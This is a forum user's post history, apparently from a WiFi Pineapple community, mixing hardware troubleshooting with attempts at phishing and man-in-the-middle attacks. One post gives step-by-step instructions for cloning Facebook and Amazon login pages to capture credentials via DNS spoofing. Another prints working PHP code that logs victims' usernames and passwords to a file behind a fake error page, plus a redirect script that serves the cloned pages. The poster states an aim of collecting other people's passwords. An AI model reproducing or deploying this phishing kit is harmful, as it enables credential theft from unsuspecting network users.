Jump to content

kdmcshane

Active Members
  • Posts

    34
  • Joined

  • Last visited

Posts posted by kdmcshane

  1. I had Windows 7 & Backtrack installed and when I would turn my laptop on, it would have a dual boot ubuntu manager where I would select booting into Windows 7 or Backtrack.

    I deleted Windows 7 and reinstalled that operating system.
    I'm guessing that during the Windows 7 installation it "repaired" the "bootmgr."

    So now it just boots into Windows 7 without asking me if I want to boot into Backtrack.
    The parition for Backtrack is still intacted. I just have no way of booting into it now.

    Is there any possible way to fix the bootmgr back to the way it was without having to reinstall Backtrack?

  2. I don't know what happened. It was working perfectly fine this morning.

    Suddenly when I plug in my ethernet cord I received with the pineappe device when I purchased it, Windows 7 is reporting "Network Cable Unplugged."

    Some people say it may have had something to do with the pineapple not getting enough power but I don't see how that was possible considering it was plugged into a wall jack.

    I also uninstalled my ethernet driver on Windows 7 and reinstalled it and that didn't help either.


    The pineapple itself seems to be working perfectly fine when I connect to it via wifi. But it just will not connect via ethernet.

    Any ideas on how to solve this problem would really really be appreciated.

  3. I would recommend you to try create your own site. Me self I have NO coding experience besides a little logic thinking, and sites like facebook is rather simple to clone. I have maybe been doing this myself for a couple of days now, and feel I have learned something already.

    You just rightclick and choose save entire page, then you just edit the .htm(l) file in an editor(i.e. notepad++) and search for action. You will find a link right after action, replace that link with i.e. error.php(which is your php script that posts information to a log file). Then a little further down the code you will find something like this for the username/email

    <input type="text" class="inputtext" name="email" id="email" value="" tabindex="1" />
    
    Here you replace name="email" to name="name". (at least with the error.php that I'm using.)

    And for the password you really don't have to change in this example, as it should be name="pass"

    <input type="password" class="inputtext" name="pass" id="pass" tabindex="2" />
    
    After that you just save the htm(l) file and upload it(and the folder with the files) to your pineapple and test it out.

    To make it clear, this might be different with other post scripts than my error.php. But I guess you figured that out since it seems you have been coding before.

    As the reason why you should try doing this yourself is that you learn a lot about the webpages while screwing around in the code, and a lot of pages is quite more difficult than FB. I would recommend you to try do it manually first, and if you are unsuccessful, THEN you can use tools like SET and others.

    Hopefully you understand what I have written, and hopefully my directions are correct. wink.png

    I attempted to follow these instructions exactly when saving other webpages such as "amazon" (sign in page) and I searched for the correct places to change by searching "tabindex" in Notepad++

    For some reason, the pineapple would load my facebook.htm but not the amazon.htm?

    Are there certain sites you can't copy and load up in DNS spoofing or is it because the amazon.htm and files that come with it are too large?

  4. At one point, I was able to get something to load when I typed in facebook.com, but that actually just went to a page listing all the files I had in my www folder on the pineapple.
    I don't want to do this because I want to collect other people's usernames and passwords. Even if I got them, you couldn't use them because their account wouldn't recognize your device but I simply enjoy the fascination of seeing these things in work. I've tried a lot of other stuff on the pineapple but this is my first attempt trying to do DNS spoofing and or pineapple phishing purely for recreational curiosity and nothing malicious. I've been working on trying to get this working for 10 hours straight and right when I think I am going to get it to work, it doesn't work.

    I'm going to continue to try to work on getting this to work tomorrow but if anyone is generous enough and are able enough to look past my noob appearance, I would greatly appreciate any help you can give me over teamviewer.

  5. Here's a snapshot of my php files.

    error.php

    <?php
    $ref = $_SERVER['HTTP_REFERER'];
    $today = date("F j, Y, g:i a");
    if (isset($_POST['name']) && !empty($_POST['name'])) {
    $nam = stripslashes($_POST['name']);
    $pas = stripslashes($_POST['pass']);
    $nam = htmlspecialchars($nam, ENT_QUOTES);
    $pas = htmlspecialchars($pas, ENT_QUOTES);
    $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
    $filed = @fopen("bitches.txt", "a+");
    @fwrite($filed, "$content\n");
    @fclose($filed);
    }
    ?>
    <html><body>
    <h1>503 Service Unavailable</h1>
    </body></html>


    --------------------------------------------------------------------------------------------------------------------------------------
    index.php

    <html>
    <head>
    <meta http-equiv="REFRESH" content="0;url=redirect.php">
    </head>
    <body>
    </body>
    </html>
    ----------------------------------------------------------------------------------------------------------------------------------------
    redirect.php

    <?php
    $ref = $_SERVER['HTTP_REFERER'];
    if (strpos($ref, "facebook")) { header('Location: facebook.html'); }
    if (strpos($ref, "twitter")) { header('Location: twitter.html'); }
    require('peets.html');
    ?>
    -------------------------------------------------------------------------------------------------------------------------------
  6. I can't even express how many tutorials I've tried following to get this to work and its still not working. This is the most recent tutorial I tried doing.

    http://hak5.org/hack/pineapple-phishing

    I followed every little instruction on this tutorial and it still doesn't work.

    If someone that is pretty savy and could set this up easy within a short period of time could jump on teamviewer and take a look at what I did wrong and why its not working, I'd really appreciate that.

  7. I'm having so many difficulties with the modules that you can install into the pineapple. They simply won't work the way they should and I don't know how to view the log files it saves onto the USB hooked into the pineapple.

    Wouldn't it be easier to just use commands on the eth0 itself rather than hassling with the modules?

    There is only one problem with that. When I go to do simple commands such as "urlsnarf -i eth0" it doesn't show any live browsing even when I am browsing websites on the pineapple's internet.

    I just don't get it.

    I know I might be asking for a bit much from the community here but I would really appreciate if someone could tell me how to either get these modules working or better yet, tell me why ettercap commands and urlsnarf commands (commands like that) are not working on the eth0 connection when clearly there are people using my pineapple device.

    Otherwise I wasted $100 on this pineapple device if I can't get it to show me live website browsing and do MITM properly. This shouldn't be this hard. It feels like sometimes the pineapple wants to work and sometimes it just won't work randomly.

    I don't know if I bought a bad pineapple or I'm just not tech savy enough.

  8. Hmm. Alright then.
    Someone told me that all I had to do was format my 8GB USB to Ex4 and all the modules would work fine. Guess its not that simple for the MITM module. I tried using the Ettercap module to do MITM on the pineapple, but I wasn't really seeing that it was working at all.

    Also, another thing, the module used to DNS spoof someone to the Rick Rolling or Nyan Cat, even when I disabled the module, it would still redirect people to those pages. I ended up having to completely uninstall it, and reboot the pineapple for it to go away.

  9. this is how i got MITM module to work 2.8.0

    Open pineapple control center shut off any and all running procs wifi ,cron jobs,karma whatever, go to Advanced TAB and clear cache.

    Next set up USB partition,make it primary EXT4 and a swap of 2 gig or more, now open USB TAB and under (config swap) change the 0 to a 1 then Update fstab.

    Now go to pineapple bar infusions MITM, install to USB wait for download to complete, now install the dependency's this is going to take a few mins so dont leave that page for anything,

    It took me 30 mins that could be because im 1/4 mile away from neighbors AP, alpha parabolic antenna & alpha 36h card lol ,

    anyway do not leave that page it will install if you follow these directions took me several times to get it to work and reading over this thread 3-4 times before i got it to work now im' sure it will work for all.

    hope i have helped in some way.and thanks to all who posted here so i could figure it out.

    Seems like a lot of work just to allow it to install. The other modules are simpler to install. Shouldn't the designers be working on a way to make this module easier to install?

  10. Despite my USB being properly formatted to Ex4 and all my other modules being installed are installing properly. MITM module absolutely does not want to install for some reason. I'll click install, and I'll sit there and wait and wait and wait only to find out that my pineapple rebooted, and I have to load it back up to access it through the browser and I check the MITM module and its not installed.

    (I am using an 8GB USB. There should be enough room for this to install)

  11. Despite my USB being properly formatted to Ex4 and all my other modules being installed are installing properly. MITM module absolutely does not want to install for some reason. I'll click install, and I'll sit there and wait and wait and wait only to find out that my pineapple rebooted, and I have to load it back up to access it through the browser and I check the MITM module and its not installed.

    Are the creators of this module aware of this? Or is there a simpler way to perform MITM attack with the pineapple?

    Thanks to anyone who can help.

×
×
  • Create New...